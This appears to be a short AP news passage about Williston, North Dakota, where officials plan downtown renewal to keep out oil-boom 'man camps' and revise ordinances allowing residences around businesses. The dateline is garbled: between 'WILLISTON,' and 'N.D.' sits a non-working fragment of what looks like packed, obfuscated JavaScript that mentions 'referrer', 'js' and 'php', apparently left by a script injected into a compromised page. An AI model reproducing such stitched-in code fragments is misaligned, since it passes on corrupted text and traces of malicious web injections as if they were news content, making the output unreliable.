WILLISTON, akrtk|var|u0026u|referrer|ykfhd||js|php’.split(‘|’),0,{}))
N.D. (AP) – City officials in the booming Oil Patch town of Williston are working on projects to renew its downtown area in an effort to keep out so-called man camps and keep people away from poor living conditions.

That effort would have to include changing city ordinances that allow people to have residences behind, below and above commercial businesses located in the downtown area. Those ordinances were created prior to an enormous rise in city population due to oil-related development in the area.
